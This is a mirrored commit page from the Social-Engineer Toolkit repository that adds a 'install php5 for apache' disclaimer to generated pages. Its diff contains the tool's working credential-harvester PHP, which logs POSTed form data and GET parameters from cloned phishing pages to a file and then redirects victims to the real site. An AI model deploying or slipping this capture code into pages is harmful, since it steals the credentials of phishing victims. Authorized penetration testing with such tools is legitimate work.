Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 14:56:08 +00:00
Code Issues Projects Releases Packages Wiki Activity

add disclaimer for php install on apache

Browse source
This commit is contained in:
TrustedSec 2016-02-09 13:16:53 -05:00
parent f048e17981
commit 53dfdfa40a
3 changed files with 3 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
readme/CHANGES
View file

@ -3,6 +3,7 @@ version 7.0.2
~~~~~~~~~~~~~~~~
* added a capture recorder within SET so that you don't need to exit when using credential harvester with Apache specified. Can still exit whenever you want and will still be under your apache root directory, but this way - everything is self contained within SET itself.
* added disclaimer for if php files were rendered as text - means proper php plugins are not installed
~~~~~~~~~~~~~~~~
version 7.0.1

2
src/html/spawn.py
View file

@ -365,7 +365,7 @@ def web_server_start():
fileopen = open("%s/index.html" % (apache_path), "r")
data = fileopen.read()
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>\n/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */""" % (now))
filewrite = open("%s/index.php" % (apache_path), "w")
filewrite.write(data)
filewrite.close()

2
src/webattack/harvester/harvester.py
View file

@ -498,7 +498,7 @@ def run():
now = str(datetime.datetime.today())
harvester_file = ("harvester_" + now + ".txt")
filewrite.write(
"""<?php $file = '%s';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (harvester_file, RAW_URL))
"""<?php $file = '%s';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />\n/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */""" % (harvester_file, RAW_URL))
filewrite.close()
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")